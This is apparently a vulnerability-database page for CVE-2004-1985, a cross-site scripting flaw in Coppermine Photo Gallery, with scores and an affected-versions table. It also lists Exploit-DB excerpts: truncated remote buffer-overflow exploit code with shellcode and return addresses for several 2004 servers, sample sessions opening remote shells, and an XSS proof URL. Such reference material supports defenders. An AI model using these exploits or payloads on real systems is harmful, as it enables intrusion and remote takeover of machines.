CVE-2004-1985
published 2004-04-30CVE-2004-1985: Cross-site scripting (XSS) vulnerability in menu.inc.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to inject arbitrary HTML or web script via…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
3.91%
89.0th percentile
Cross-site scripting (XSS) vulnerability in menu.inc.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to inject arbitrary HTML or web script via the CPG_URL parameter.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
exploitdb·2004-11-29
CVE-2004-1135 Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
---
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo :)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 21
#define RPORT 4444
#define RET "\x53\x9B\x2E\x7C" /*win2k sp4*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe"
"
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (2)
exploitdb·2004-11-16
CVE-2004-2271 MiniShare 1.4.1 - Remote Buffer Overflow (2)
MiniShare 1.4.1 - Remote Buffer Overflow (2)
---
/*
no@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2
***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 80.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 4444..
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\Program Files\MiniShare>
Greetz to NtWaK0,kane,kamalo,foufz, and schap :)
http://NoPh0BiA.lostspirits.org
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 80
#define PORT1 4444
#define RET "\xB8\x9E\xE3\x77" /*2k sp2*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\
Exploit-DB
TABS MailCarrier 2.51 - Remote Buffer Overflow
exploitdb·2004-11-16
CVE-2004-1638 TABS MailCarrier 2.51 - Remote Buffer Overflow
TABS MailCarrier 2.51 - Remote Buffer Overflow
---
/* Remote exploit for MailCarrier by NoPh0BiA,
no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**
[x] Connected to: 192.168.0.1 PORT: 25
[x] Sending evil buffer..done.
[x] Trying to connect to port 31337..
[x] Connected to: 192.168.0.1 PORT: 31337
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greets to NtWaK0,schap,kane,kamalo,foufs :P
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 25
#define RPORT 31337
#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/
char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x8
Exploit-DB
Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
exploitdb·2004-11-07
CVE-2004-1626 Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
---
/*
no@0x00:~/Exploits/abilityftp$ ./ability-exploit
**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**
[x] Launching listener.
[x] Bind successfull.
[x] Listening on port 31337.
[x] Connected to: 192.168.0.1.
[x] Sending bad code...done.
[x] Waiting for shell.
[x] Got connection from 192.168.0.1.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop\abilitywebserver>
reverse shellcode that connects back to 192.168.0.2 lamers get your own shellcode ;)
bad chars 0x00 0x0a 0x0d.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RET "\xC7\xF2\xC8\x77" /*win
Exploit-DB
TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
exploitdb·2004-10-26
CVE-2004-1638 TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
---
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 23 Oct 2004 - muts #
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py #
#########################################################
# D:\data\tools>nc -v 192.168.1.32 101 #
# localhost [127.0.0.1] 101 (hostname) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\WINNT\system32> #
#########################################################
import struct
import socket
print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO
Exploit-DB
Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
exploitdb·2004-10-21
CVE-2004-1626 Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
---
###################################
# Ability Server 2.34 FTP STOR Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 21 Oct 2004 - muts #
###################################
# D:\BO>ability-2.34-ftp-stor.py #
###################################
# D:\data\tools>nc -v 127.0.0.1 4444 #
# localhost [127.0.0.1] 4444 (?) open #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# D:\Program Files\abilitywebserver> #
###################################
import ftplib
from ftplib import FTP
import struct
print "\n\n################################"
print "\nAbility Server 2.34 FTP STOR buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Pur
Exploit-DB
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
exploitdb·2004-10-06
CVE-2004-1561 Icecast 2.0.1 (Win32) - Remote Code Execution (1)
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
---
/*
by Luigi Auriemma
Shellcode add-on by Delikon
www.Delikon.de
Because of all the forbidden bytes in a http get request
i had to use a very small shellcode, which was blown up
by Msf::Encoder::PexAlphaNum. Great encoder.
C:>iceexec 127.0.0.1
Icecast nc 127.0.0.1 9999
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Icecast2 Win32>
*/
#include
#include
#include
#ifdef WIN32
#pragma comment(lib, "ws2_32.lib")
#include
#include "winerr.h"
#define close closesocket
#else
#include
#include
#include
#include
#include
#include
#endif
#define VER "0.1"
#define PORT 8000
#define BUFFSZ2048
#define TIMEOUT 3
#define EXEC"GET / HTTP/1.0rn"
"arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"
"arn" "arn" "a
Exploit-DB
Coppermine Photo Gallery 1.2.2b - 'menu.inc.php' Cross-Site Scripting
exploitdb·2004-04-30
CVE-2004-1985 Coppermine Photo Gallery 1.2.2b - 'menu.inc.php' Cross-Site Scripting
Coppermine Photo Gallery 1.2.2b - 'menu.inc.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/10253/info
Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands.
Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible.
http://www.example.com/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar">
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=108360247732014&w=2http://secunia.com/advisories/11524http://www.osvdb.org/5757http://www.securityfocus.com/bid/10253http://www.waraxe.us/index.php?modname=sa&id=26https://exchange.xforce.ibmcloud.com/vulnerabilities/16040http://marc.info/?l=bugtraq&m=108360247732014&w=2http://secunia.com/advisories/11524http://www.osvdb.org/5757http://www.securityfocus.com/bid/10253http://www.waraxe.us/index.php?modname=sa&id=26https://exchange.xforce.ibmcloud.com/vulnerabilities/16040
2004-04-30
Published